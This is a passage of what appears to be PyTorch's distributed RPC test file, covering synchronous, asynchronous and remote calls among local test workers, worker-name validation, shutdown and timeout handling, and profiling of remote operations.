name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
expect = torch.ones(2, 2) * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(torch.ones(2, 2), torch.ones(2, 2))
)
self.assertEqual(expect, result)
expect = torch.ones(3, 3) * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(torch.ones(3, 3), torch.ones(3, 3))
).wait()
self.assertEqual(expect, result)
expect = torch.ones(4, 4) * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(torch.ones(4, 4), torch.ones(4, 4))
).to_here()
self.assertEqual(expect, result)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_invalid_names(self):
from torch.distributed.rpc import WorkerInfo
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
workder_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
workder_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
def _run_uneven_workload(self, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
def test_wait_all_workers(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.shutdown(graceful=False)
def test_wait_all_workers_twice(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
rpc.shutdown(graceful=False)
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload()
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with torch.autograd.profiler.profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with torch.autograd.profiler.profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with torch.autograd.profiler.profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with torch.autograd.profiler.profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
# prefixied when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event needs to be
# in the above set, the set is just a representative set of
# what we expect to see. The profiler can change and add more
# events, but we should always expect to see this representative
# set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate order remote events show up in profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(remote_events_list, EXPECTED_REMOTE_EVENTS)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@single_threaded_process_group_agent
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with torch.autograd.profiler.profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@single_threaded_process_group_agent
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
remaining_remote_events = {
evt for evt in function_events if evt.node_id == dst_rank
} - {record_function_remote_event}
# These ops are created by the hack of casting record_function to a
# tensor, so they should not count in the actual UDF profiled time.
# TODO remove after https://github.com/pytorch/pytorch/issues/43868
# is resolved.
remote_events_denylist = [
"aten::zeros",
"aten::empty",
"aten::zero_",
"aten::fill_",
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[event_name.find(remote_op_key) + len(remote_op_key) :]
# Ideally, we should validate that the sum of remote operations within
# record_function are less than record_function's CPU time. However,
# there is a known bug in profiling
# (https://github.com/pytorch/pytorch/issues/45160) due to which we
# can't do this. So, we just validate they are child events.
prof.key_averages()
# cpu_children only returns direct children, so here we get all
# children recursively.
def get_cpu_children(event):
if not event.cpu_children:
return []
cpu_children = event.cpu_children
for e in event.cpu_children:
cpu_children.extend(get_cpu_children(e))
return cpu_children
record_function_children_names = [
convert_remote_to_local(c.name)
for c in get_cpu_children(record_function_remote_event)
]
for evt in remaining_remote_events:
local_name = convert_remote_to_local(evt.name)
if local_name not in remote_events_denylist:
self.assertTrue(
local_name in record_function_children_names,
f"{local_name} not in {record_function_children_names}",
)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with torch.autograd.profiler.profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with torch.autograd.profiler.profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with torch.autograd.profiler.profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertTrue(scope_event.time_range.start < rpc_event.time_range.start)
self.assertTrue(scope_event.time_range.end > rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
self.assertEqual(sorted(top_level_event_names), sorted(expected_top_level_event_names))
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
self._assert_top_level_events(inner_events, ['aten::sub'])
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, ['aten::add', 'aten::sub'])
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with torch.autograd.profiler.profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with torch.autograd.profiler.profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
